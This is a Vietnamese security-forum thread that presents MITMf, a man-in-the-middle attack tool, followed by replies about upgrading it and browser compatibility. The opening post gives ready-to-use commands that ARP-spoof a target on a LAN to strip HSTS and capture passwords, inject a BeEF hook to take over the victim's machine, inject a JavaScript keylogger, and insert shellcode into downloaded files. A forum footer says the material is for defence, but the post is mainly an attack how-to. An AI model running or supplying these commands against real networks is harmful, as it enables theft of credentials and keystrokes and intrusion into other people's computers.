MITMF -- Công cụ MITM tuyệt vời!

DDos

VIP Members
22/10/2013
524
2.191 bài viết
MITMF -- Công cụ MITM tuyệt vời!
Có thể nói trong mạng LAN, tấn công hiệu quả và nguy hiểm nhất là MITM. Với tấn công MITM, kẻ tấn công có thể ăn cắp cookie, ăn cắp thông tin cá nhân, tài khoản mạng xã hội, thậm chí là xâm nhập vào máy tính của nạn nhân. Hiện nay, có rất nhiều công cụ mã nguồn mở cho phép thực hiện các chức năng trên, nhưng để tìm một công cụ có thể làm được tất cả những chức năng trên thì có lẽ hơi khó. MITMF là một công cụ mà đáp ứng được yêu cầu này.
MITMF được viết bởi Marcello Salvati sử dụng ngôn ngữ lập trình python.

1489939945Screenshot from 2015-08-31 21:15:48.jpg



Với MITMF bạn có thể thực hiện rất nhiều kiểu tấn công khác nhau như spoof arp, spoof dns, spoof dhcp, phá vỡ cơ chế bảo mật HSTS, inject javascript, .... với cú pháp vô cùng đơn giản.

Để cài đặt mitmf trong Kali Linux, các bạn dùng lệnh sau:

apt-get install mitmf

+ Để phá vỡ cơ chế bảo mật HSTS để hiển thị mật khẩu ở dạng clear-text, bạn dùng lệnh sau:

mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --hsts

Để rõ hơn các bạn có thể xem video dưới đây:

[video=youtube;cTAPu7BHIVc]https://www.youtube.com/watch?v=cTAPu7BHIVc[/video]

+ Bạn có thể xâm nhập máy tính, không cần tương tác của người dùng bằng cách inject BEEF hook js với lệnh:

mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --js-url

Để rõ hơn các bạn có thể xem video dưới đây

+ Inject jskeylogger để ghi lại toàn bộ thao tác bàn phím mà người dùng không hề biết với lệnh:

mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --jskeylogger

Để rõ hơn các bạn tham khảo video dưới đây:

[video=youtube;6v7OQjU1s_Y]https://www.youtube.com/watch?v=6v7OQjU1s_Y[/video]

+ Inject shellcode vào gói tin với lệnh:

mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --filepwn

Để rõ hơn các bạn tham khảo video dưới đây:

[video=youtube;6v7OQjU1s_Y]https://www.youtube.com/watch?v=6v7OQjU1s_Y[/video]
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: MITMF -- Công cụ MITM tuyệt vời!

Cảm ơn bạn Ddos, cho mình hỏi thêm, hình ảnh thì bạn đưa version 0.9.7; trong video thì là 0.9.8. Mình cài 0.9.7 rồi có cách nào nâng cấp lên 0.9.8 không hay là phải cài mới? V 0.9.8 khác gì so với 0.9.7. Mình test thử hình như thằng Crome nó fix rồi, không bypass hsts được, IE 11 thì được, chứ IE Edge của Win 10 cũng không được. Hiện giờ thì phương pháp này còn hoạt động tốt hay không? tại vì mình test Facebook thì dù ở trình duyệt nào cũng ko được.Xin ý kiến của bạn
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: MITMF -- Công cụ MITM tuyệt vời!

Để nâng cấp lên phiên bản 0.9.8 thì bạn vào https://github.com/byt3bl33d3r/MITMf , tải file về. Phiên bản 0.9.8 chủ yếu là cập nhật các vấn đề liên quan tới bdf plug-in. Mình chưa test trên google-chrome trên máy tính, còn chrome trên điện thoại thì ok.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: MITMF -- Công cụ MITM tuyệt vời!

Chrome trên SamSum Note3 không thể sniff Được.......... Đau:mad:
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
A thất nghiệp ơi cho em hỏi , em chưa cài mitmf sử dụng lệnh apt-get install mitmf như cờ líp, xong trỏ tới opt/sniffiing-spoofing/mitmf thì lỗi như hình ,
thử download file 0.9.8 , em trỏ tới file mitmf - master chạy mifmt.py không ra . Lệnh chmod a+x, ls là gì vậy trước giờ làm theo chứa em không hiểu đâu chắc thế nó mới sai .
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Hackerstudent98;n52265 đã viết:
A thất nghiệp ơi cho em hỏi , em chưa cài mitmf sử dụng lệnh apt-get install mitmf như cờ líp, xong trỏ tới opt/sniffiing-spoofing/mitmf thì lỗi như hình , thử download file 0.9.8 , em trỏ tới file mitmf - master chạy mifmt.py không ra . Lệnh chmod a+x, ls là gì vậy trước giờ làm theo chứa em không hiểu đâu chắc thế nó mới sai .
Trong Kali linux, nếu em dùng lệnh apt-get install mitmf thì nó sẽ nằm ở thư mục /usr/share/mitmf/ và mở terminal lên chỉ cần nhập mitmf là chạy được, Nhưng trong Kali, thường cập nhật khá chậm các công cụ không "chủ chốt" (version trong kali linux là 0.97), còn mitmf mới nhất là 0.98, nên anh tải về mitmf từ github đặt trong thư mục /opt/ ....chmod a+x là thay đổi permission, ls là liệt kê file, thư mục trong một path...
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
up lai video dc khong vay. khong xem dc video
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
athena2309;n53410 đã viết:
up lai video dc khong vay. khong xem dc video
Do kênh Youtobe bị report die nên anh em thông cảm nhé. BQT sẽ sớm khắc phục vấn đề này.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên